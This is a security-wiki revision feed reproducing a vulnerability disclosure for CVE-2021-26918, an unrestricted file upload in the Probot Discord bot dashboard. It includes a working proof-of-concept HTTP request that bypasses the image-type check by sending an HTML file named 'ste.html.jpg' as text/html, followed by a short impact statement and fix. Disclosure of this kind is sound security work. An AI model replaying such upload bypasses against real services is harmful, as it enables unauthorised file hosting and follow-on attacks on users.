https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-26918_Discord_Probot_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9ECVE-2021-26918 Discord Probot 任意文件上傳漏洞 - Revision history2026-04-26T16:10:48ZRevision history for this page on the wikiMediaWiki 1.35.1https://pwnwiki.com/index.php?title=CVE-2021-26918_Discord_Probot_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E5%82%B3%E6%BC%8F%E6%B4%9E&diff=3635&oldid=prevPwnwiki: Created page with "<pre> # Exploit Title: Discord Probot - Unrestricted File Upload # Google Dork: N/A # Date: 2021-02-08 # Exploit Author: ThelastVvV # Vendor Homepage:probot.io # Version:Vers..."2021-05-30T03:00:17Z<p>Created page with "<pre> # Exploit Title: Discord Probot - Unrestricted File Upload # Google Dork: N/A # Date: 2021-02-08 # Exploit Author: ThelastVvV # Vendor Homepage:probot.io # Version:Vers..."</p>
<p><b>New page</b></p><div><pre><br />
# Exploit Title: Discord Probot - Unrestricted File Upload <br />
# Google Dork: N/A<br />
# Date: 2021-02-08<br />
# Exploit Author: ThelastVvV<br />
# Vendor Homepage:probot.io<br />
# Version:Version 2021<br />
# Tested on: Debian 5.7.10-1parrot2<br />
# CVE:CVE-2021-26918<br />
<br />
<br />
About:<br />
Probot is a discord very customizable multipurpose bot for welcome image, In-depth logs, Social commands, Music, Moderation and many more ...<br />
<br />
# Description:<br />
<br />
The attacker can acces to probot dashboard and use image uploader in the welcomer tab , the attacl can upload many file types due the issues of unrestricted file uploads which can be bypassed by changing multipart/form-data POST request with a specially-crafted filename or mime type.<br />
<br />
# PoC:<br />
<br />
<br />
POST / HTTP/1.1<br />
Host: uploader.probot.io<br />
Accept: application/json, text/plain, */*<br />
Accept-Language: en-US,en;q=0.5<br />
Accept-Encoding: gzip, deflate<br />
Content-Type: multipart/form-data; boundary=---------------------------<br />
Content-Length: 333<br />
Origin: https://probot.io<br />
DNT: 1<br />
Connection: close<br />
Referer: https://probot.io/server/""/welcomer<br />
<br />
-----------------------------<br />
Content-Disposition: form-data; name="file"; filename="ste.html.jpg"<br />
Content-Type: text/html<br />
<br />
<!DOCTYPE html><br />
<html><br />
<head><br />
<title>bypasss</title><br />
</head><br />
<body><br />
<div>bypass</div><br />
</body><br />
</html><br />
<br />
-------------------------------<br />
<br />
Note:the link of the file will be generated depend on the content type in this case .html<br />
<br />
# Impact<br />
Unrestricted file uploads can be abused to exploit other vulnerable sections of an application when a file on the same or a trusted server is needed (can again lead to client-side or server-side attacks)<br />
<br />
#Solution<br />
File types should be restricted to only jpg ,png ,jpeg (text/img)<br />
</pre></div>Pwnwiki